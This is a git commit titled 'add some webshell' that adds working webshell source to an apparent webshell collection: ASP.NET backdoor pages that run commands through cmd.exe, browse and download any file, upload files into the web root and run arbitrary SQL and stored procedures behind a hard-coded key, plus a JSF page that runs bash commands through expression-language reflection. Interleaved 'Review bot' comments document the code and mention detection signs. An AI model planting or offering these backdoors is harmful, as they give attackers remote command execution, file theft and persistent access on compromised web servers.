add some webshell

tennc 2014-05-19 09:10:17 +08:00
parent a7d2684ed0
commit 8870eb9484
24 changed files with 12299 additions and 0 deletions

3
asp/ajs/readme.md Normal file

@ -0,0 +1,3 @@
like this:
www.site.com/shell.asp?x=a

2
asp/ajs/shell.asp Normal file

File diff suppressed because one or more lines are too long

2198
asp/ajs/shell_decoded.asp Normal file

File diff suppressed because it is too large Load diff


@ -0,0 +1,52 @@
ASP.NET Backdoors
Copyright (c) 2012 woanware
Developed by Mark Woan (markwoan[at]gmail.com)
---------------------------------------------------------------------------
Change Log
----------
v1.3.0
------
- Added an auth key parameter, so that you can password protect each of the
pages. Modify the constant located at the top of each file. The
filesystembrowser.aspx file needs you to initially specify the "authkey=XXX"
parameter value
v1.2.0
------
- Added spexec.aspx allows you to dynamically load SQL Server stored
procedures and associated parameters, then execute the SP
v1.1.0
------
- Added sql.aspx which allows you to execute SQL statements
v1.0.2
------
- MikeA has kindly modified filesystembrowser.aspx and fileupload.aspx so that
if the application renames the files on upload, the functionality still
works, since I had hardcoded the filenames
v1.0.1
------
- Added extra validation to filesystembrowser.aspx to catch errors when
assigning a default drive. Thanks foob for the feedback
v1.0.0
------
- Initial Public Release
---------------------------------------------------------------------------
woanware
http://www.woanware.co.uk/


@ -0,0 +1,96 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td>&nbsp;</td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
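Review bot: The three `/// <summary>` blocks in this page are empty, so nothing states that `ExecuteCommand` appends the posted `txtCommand` text to `"/c "` and starts `cmd.exe` under the web application's identity, gated only by a comparison with the hard-coded `AUTHKEY` constant. I would fill the summary on `ExecuteCommand` with `/// Runs the supplied text through cmd.exe /c and returns its standard output; the only restriction is the AUTHKEY comparison in btnExecute_Click.` so that anyone triaging the file sees its effect at once. Because the key is a literal shipped in the source, a copy left on a host after a test is protected by a value that anyone can read from this commit; for detection, the observable behaviour is the web server's worker process starting `cmd.exe`. The table markup also opens its last row without a `<tr>`.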


@ -0,0 +1,207 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td>&nbsp;<td></tr></table>");
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
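Review bot: `Page_Load`, `DownloadFile` and `OutputList` carry empty `<summary>` blocks, and nothing records that the key and the target path are read from `Request.Params` and that every link built in `OutputList` repeats `&authkey=` in the URL. I would document that on `Page_Load`, e.g. `/// Dispatches on the "operation" parameter (list/download) after comparing "authkey" with AUTHKEY; paths come from "directory" and "file" unchanged.` Since these values travel in the query string, requests to this page leave `authkey=`, `operation=`, `directory=` and `file=` pairs in the server's access log, which is what an investigator would search for. The `<asp:TextBox runat="server">` string appended in `OutputList` is sent as literal text rather than processed as a server control, and drive, directory and file names are written into the markup without `Server.HtmlEncode`.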


@ -0,0 +1,126 @@
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
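Review bot: `UploadFile` has an empty `<summary>` although it writes the posted file into the directory of the page itself (taken from `Request.PhysicalPath`) with `FileMode.Create`, so an upload lands in a web-served folder and silently replaces any file of the same name. I would state that in the summary, e.g. `/// Saves the single posted file next to this page under its client-supplied name (Path.GetFileName only), overwriting an existing file.` No extension, size or content check is applied before the write, so the control that notices this activity is file-integrity monitoring on the web root rather than anything in the page. The `HEADER` constant still carries the title `filesystembrowser`, apparently copied from the browser page.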


@ -0,0 +1,367 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnLogin_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataAdapter sqlDataAdapter = null;
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "SPs");
cboSps.DataSource = dataSet.Tables["SPs"];
cboSps.DataTextField = "PROCEDURE_NAME";
cboSps.DataBind();
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
catch (Exception ex)
{
lblStatus.Text = ex.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnGetParameters_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "Parameters");
gridParameters.DataSource = dataSet.Tables["Parameters"];
gridParameters.DataBind();
gridResults.Visible = false;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
DataSet dataSet = new DataSet();
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
this.AddParameters(sqlCommand);
sqlDataAdapter.Fill(dataSet, "Results");
this.UpdateParameters(sqlCommand);
gridResults.DataSource = dataSet.Tables["Results"];
gridResults.DataBind();
gridResults.Visible = true;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void AddParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
{
case "bit":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "bigint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "char":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "datetime":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "decimal":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "float":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "int":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "ntext":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nvarchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "real":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "smallint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "tinyint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "varchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
default:
continue;
}
}
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
{
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void UpdateParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Stored Procedure Execute</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="form1" runat="server">
<table>
<tbody>
<tr>
<td>
Key:</td>
<td>
<asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database server:</td>
<td>
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
User id:</td>
<td>
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Password:</td>
<td>
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database:</td>
<td>
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
</td>
<td>
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
</td>
</tr>
<tr>
<td>
Stored procedures:</td>
<td>
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
</td>
</tr>
<tr>
<td>
</td>
<td>
<p>
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
</p>
</td>
</tr>
<tr>
<td>
Status:</td>
<td>
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
</tr>
</tbody>
</table>
<p>
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
<Columns>
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
<asp:TemplateColumn HeaderText="Input Value">
<ItemTemplate>
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
</ItemTemplate>
</asp:TemplateColumn>
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
</Columns>
</asp:DataGrid>
</p>
<p>
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
</p>
<p>
</p>
<p>
<a href="spexec.aspx">Restart</a>
</p>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
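Review bot: `AddParameters` and `UpdateParameters` address grid cells by bare index (`Controls[0]`, `[1]`, `[2]`, `[5]`, `[6]`, `[7]`) and compare the column type with the literal strings `"5"` and `"2"`, with empty `<summary>` blocks and no comment saying what either means. From the `BoundColumn` order in the markup the indexes appear to follow the grid columns, and a comment such as `// cells follow gridParameters column order: 0=column_name, 1=type_name, 2=length, 5=column_type, 6=input TextBox, 7=output value` would make that checkable. The meaning of `"5"` and `"2"` is not visible in this file and should be documented from the `sp_sproc_columns` definition rather than guessed. Separately, `btnGetParameters_Click` and `btnExecute_Click` catch only `SqlException`, so the lookup in `UpdateParameters` for a parameter that `default: continue` skipped would presumably surface as an unhandled error page.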


@ -0,0 +1,104 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = txtConnection.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataReader sqlDataReader = null;
sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
sqlCommand.CommandType = CommandType.Text;
sqlDataReader = sqlCommand.ExecuteReader();
StringBuilder output = new StringBuilder();
output.Append("<table width=\"100%\" border=\"1\">");
while (sqlDataReader.Read())
{
output.Append("<tr>");
int colCount = sqlDataReader.FieldCount;
for (int index = 0; index < colCount; index++)
{
output.Append("<td>");
output.Append(sqlDataReader[index].ToString());
output.Append("</td>");
}
output.Append("</tr>");
output.Append(Environment.NewLine);
}
output.Append("</table>");
Literal1.Text = output.ToString();
}
catch (SqlException sqlEx)
{
Response.Write(sqlEx.ToString());
}
catch (Exception ex)
{
Response.Write(ex.ToString());
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>SQL</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="formSql" runat="server">
<div>
<table width="100%">
<tr><td width="30">Auth Key:</td><td><asp:TextBox ID="txtAuthKey" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>Connection:</td><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>SQL:</td><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td></tr>
<tr><td>&nbsp;</td><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td></tr>
<tr><td colspan="2"><asp:Literal ID="Literal1" runat="server"></asp:Literal></td></tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
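Review bot: The handler's `<summary>` is empty although `btnExecute_Click` opens whatever `txtConnection` names and runs the `txtSql` text as `CommandType.Text`, with the `AUTHKEY` comparison as the only restriction. I would document it as `/// Executes the text of txtSql on the connection described by txtConnection and renders every returned row as an HTML table.` The cell values (`sqlDataReader[index].ToString()`) and both `ex.ToString()` outputs are written without `Server.HtmlEncode`, so stored data that contains markup is interpreted by the browser of whoever views the result. `sqlCommand` and `sqlDataReader` are never disposed; only the connection is released in `finally`.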

1689
aspx/wso.aspx Normal file

File diff suppressed because it is too large Load diff


@ -0,0 +1,103 @@
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
<style type="text/css">
.wrapper{
border: 2px solid black;
background-color: #C0C0C0 ;
overflow:hidden;
margin: auto;
width: 50%;
word-wrap: break-word;
}
.field{
margin: 20px;
}
.output{
}
body{
background-color: #383838;
}
</style>
<body>
<c:choose>
<c:when test="${request.getParameter('do') != null}">
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
</c:when>
<c:when test="${request.getParameter('cmd') !=null}">
<code>
<i>${request.getParameter("cmd")}</i>:
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
),"\\Z"
)
)}</pre>
</code>
</c:when>
<c:when test="${request.getParameter('clear')!= null}">
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
</c:when>
</c:choose>
<div class="wrapper">
<div class="field">
<center>----------------------------------------------------------</center>
<div class="output" id="output">
</div>
<center>----------------------------------------------------------</center>
<center>
<form onsubmit="return startMagic()">
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
</form>
</center>
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
</div>
</div>
</body>
<script type="text/javascript">
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
} else {// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
function startMagic(){
try{
//execution
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
console.log(xmlhttp.responseText);
//reading
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
a = xmlhttp.responseText.indexOf('<code>');
b = xmlhttp.responseText.indexOf('</code>');
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
//cleaning
xmlhttp.open("GET",location.pathname+"?clear",true);
xmlhttp.send();
}catch(e){
console.log(e);
}
return false;
}
</script>
</html>
